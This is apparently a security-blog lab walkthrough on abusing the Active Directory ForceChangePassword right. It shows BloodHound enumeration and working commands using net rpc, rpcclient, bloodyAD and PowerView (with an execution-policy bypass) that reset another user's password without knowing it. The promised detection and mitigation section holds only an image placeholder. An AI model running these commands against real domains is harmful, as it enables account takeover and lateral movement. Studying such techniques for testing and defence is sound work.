In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the ForcePasswordChange permission in Active Directory environments. This permission is especially dangerous for privileged accounts, as it enables lateral movement and unauthorized access across systems by impersonating the compromised account.
The lab setup necessary to simulate these
attacks is outlined, with methods mapped to the MITRE ATT&CK framework to
clarify the associated techniques and tactics. Detection mechanisms for
identifying suspicious activities linked to ForcePasswordChange attacks are
also covered, alongside actionable recommendations for mitigating these
vulnerabilities. This overview equips security professionals with critical
insights to recognize and defend against these prevalent threats.
Table of Contents
Abusing AD-DACL- ForceChangePassword
ForceChangePassword Right
Prerequisites
Lab Setup – User Owns ForceChangePassword
Rights
Exploitation – User Owns
ForceChangePassword Rights
Bloodhound - Hunting for Weak Permission
Method for Exploitation – Change Password
(T1110.001)
- Linux Net RPC – Samba
- Linux Net RPC – Rpcclient
- Linux Net RPC – BloodAD
- Windows PowerShell - Powerview
Detection & Mitigation
ForceChangePassword Right
This permission provides right to change
the password of a user account without knowing their current password.
This abuse can be carried out when
controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over
the target user.
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Bloodhound, Net RPC, Powerview, BloodyAD
- Windows 10/11 – As Client
Lab Setup – User Owns ForceChangePassword Rights
Here, in this lab setup, we will create two
users’ Raj and Aarti, and will assign Raj user “Reset Password” rights for Aarti
User.
- Create the AD Environment:
To simulate an Active Directory
environment, you will need a Windows Server as a Domain Controller (DC) and a
client machine (Windows or Linux) where you can run enumeration and
exploitation tools.
- Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active
Directory Domain Services role.
- Set up the domain (e.g., ignite.local).
- User Accounts:
- Create two AD user accounts named Raj and Aarti.
net user raj Password@1 /add /domain
net user aarti Password@1 /add /domain
2. Assign the "ForceChangePassword" Privilege to Raj for
Aarti User:
Once your AD environment is set up, you
need to assign the "ForceChangePassword" rights to Raj
for Aarti user.
- Steps:
- Open Active Directory Users and Computers (ADUC) on the
Domain Controller.
- Enable the Advanced Features view by clicking on View
> Advanced Features.
- Locate User Aarti in the Users container.
- Right-click on Aarti User and go to Properties.
- Go to the Security tab
- And click on Add button
- In the “Enter the object name to select” box, type Raj and
click Check Names.
- In the Permissions section, check the box
for Reset Password permission.
- Apply the settings.
At this point, Raj now has Reset
Password rights for Aarti user, meaning Raj can change
the password of Aarti user’s account without knowing their current
password
Exploitation
Bloodhound - Hunting for Weak Permission
Use BloodHound to Confirm Privileges: You can use BloodHound to verify
that Raj has the ForceChangePassword rights for Aarti
user.
bloodhound-python -u raj -p Password@1
-ns 192.168.1.8 -d ignite.local -c All
From the graphical representation of
Bloodhound, the tester would like to identify the outbound object control for
selected user where the first degree of object control value is equal to 1.
Thus, it has shown that Raj User has
ForceChangePassword privilege for Aarti user.
Method for Exploitation – Change Password (T1110.001)
The tester can abuse this permission by
changing password for Aarti user without knowing their current password.
- Linux Net RPC – Samba
It can be achieved from UNIX-like system
with net, a tool for the administration of samba and cifs/smb
clients.
net rpc password aarti 'Password@987' -U
ignite.local/raj%'Password@1' -S 192.168.1.8
2. Linux Net RPC – Rpcclient
The rpcclient can also be
used on UNIX-like systems when the package samba-common-bin is
missing.
rpcclient -U ignite.local/raj
192.168.1.8
setuserinfo aarti 23 Password@987
3. Linux Bloody AD
Alternatively, it can be achieved
using bloodyAD
bloodyAD --host "192.168.1.8"
-d "ignite.local" -u "raj" -p "Password@1" set
password "aarti" "Password@987"
4. Windows PowerShell - Powerview
The attacker can change the password of the
user using PowerView module. This can be achieved with Set-DomainUserPassword
cmdlet.
powershell -ep bypass
Import-Module .\PowerView.ps1
$NewPassword = ConvertTo-SecureString
'Password1234' -AsPlainText -Force
Set-DomainUserPassword -Identity 'aarti'
-AccountPassword $NewPassword
Detection & Mitigation
.png)
0 comments:
Post a Comment